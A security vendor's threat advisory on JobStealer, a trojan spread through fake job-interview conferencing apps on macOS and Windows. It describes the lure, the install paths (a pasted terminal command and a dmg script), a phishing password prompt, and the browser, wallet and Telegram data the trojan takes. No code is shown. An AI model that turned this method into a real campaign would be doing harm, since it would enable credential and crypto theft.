Instead of a job—stolen data and money. Trojan stealer targeting macOS and Windows users conceals itself in fake online interview apps

Doctor Web’s experts are warning users about the spread of JobStealer, a trojan app that steals confidential information from macOS and Windows computer users. It primarily aims to hijack data from crypto wallets. Fraudsters, under the pretext of conducting online interviews, lure potential victims to malicious websites and ask them to download a video conferencing app. In reality, this software is the JobStealer trojan.

The attack begins with the threat actors contacting potential victims and offering them a particular job vacancy. They invite users to a job interview and provide them with links to websites for the online meeting “platforms”—supposedly to connect to a video conference. These websites look presentable but are actually fraudulent. The malicious program JobStealer, disguised as an online conferencing app, is downloaded from them. Cybercriminals use different designs for these Internet resources and also change the names of the “software”. Our specialists identified variants called MeetLab, Juseo, Meetix, Carolla, and others. In some cases, the attackers use names of real services, like Webex.

 

Examples of websites for fake online conferencing services from which JobStealer is downloaded

To convince users that these platforms are fully functional, scammers create corresponding Telegram channels and social media accounts—for example, on X.

 

To disguise the trojan as a legitimate piece of software, threat actors create the appearance of activity on social networks

To install the app on devices running macOS, visitors to malicious websites are provided with two options:

• copy the bash command listed on the website and run it in the terminal;
• download a disk image file in the .dmg format and launch it.

 

The JobStealer trojan is downloaded from malicious websites both in the form of a dmg container and by running a bash command in the terminal

In the first case, when a command is executed in the terminal, a script is automatically downloaded from the Internet and then executed. This script downloads and runs the JobStealer’s executable file (detected as Mac.PWS.JobStealer.1).

In the second case, the dmg image offered for download initially contains the abovementioned files. When mounted, it displays instructions on how to “install” the app. These instructions state that the user needs to open the terminal and drag the provided script into its window. In fact, instead of the video conferencing app getting installed, the script will launch the trojan file.

 

An image with the instructions that are displayed when the disk image file containing the JobStealer trojan is opened

Mac.PWS.JobStealer.1 is an executable container file in the Fat Mach-O format. It contains binary code for several processor architectures—x64 and arm64. Depending on the infected computer’s platform, when the trojan is launched, the component corresponding to the target processor is automatically initialized.

It should be noted that different versions of Mac.PWS.JobStealer.1 exist. The earlier variants of the malware did not work on Mac computers with the arm64 architecture. They also lacked obfuscation—something the trojan’s creators began to add and strengthen when updating the stealer.

When launched, Mac.PWS.JobStealer.1 displays a phishing window that alerts users about an alleged error in the app’s operation. To “fix” this error, the malicious program asks users to provide their user account password.

 

A phishing window asking for a Mac user account password

Next, Mac.PWS.JobStealer.1 collects the following data:

• operating system version and computer ID;
• data from about 300 crypto wallet browser extensions installed in target browsers based on Chromium (Chrome, Opera, Brave, OperaGX, Vivaldi, Edge, Arc, and CocCoc);
• cookie files from these browsers;
• passwords and bank card details saved in the browser’s autofill lists;
• Telegram messenger files from the directories /Library/Application Support/Telegram Desktop/tdata and /Documents/temp_data/Apps/Telegram, where session authorization keys, downloaded files, etc., are stored;
• user notes from the native macOS Notes application;
• evidence that the crypto wallets Ledger Live and Trezor Suite are present in the system.

This data is packed into a ZIP archive and uploaded to the C2 server.

The malware’s creators have also prepared a version of JobStealer for computers running the Windows operating system. Its functionality is similar to that of the macOS version. In addition, some malicious websites distributing the stealer have dedicated sections for downloading the app for other popular operating systems. However, at this time, our virus analysts have not recorded their distribution. For example, the button for downloading the app for the Linux operating system is either inactive or leads to the Windows version of the trojan. And sections for downloading the app onto devices with iOS and Android inform users that these versions are in development. At the same time, it cannot be ruled out that the attackers will begin distributing variants of this trojan for those platforms in the future.

 

Malicious sites can potentially distribute versions of the JobStealer trojan designed for Linux, iOS, and Android

Dr.Web Security Space anti-virus products for macOS and Windows reliably detect and delete all known JobStealer malware modifications, keeping our users well protected from this threat. Fraudulent websites distributing the trojan are added to the database of non-recommended and dangerous resources and are also blocked by Dr.Web.

MITRE ATT&CK®

We analyzed Mac.PWS.JobStealer.1 using the MITRE ATT&CK® framework, a matrix describing the tactics and techniques that cybercriminals utilize to attack information systems. The following key techniques were identified:

More details about Mac.PWS.JobStealer.1

Indicators of compromise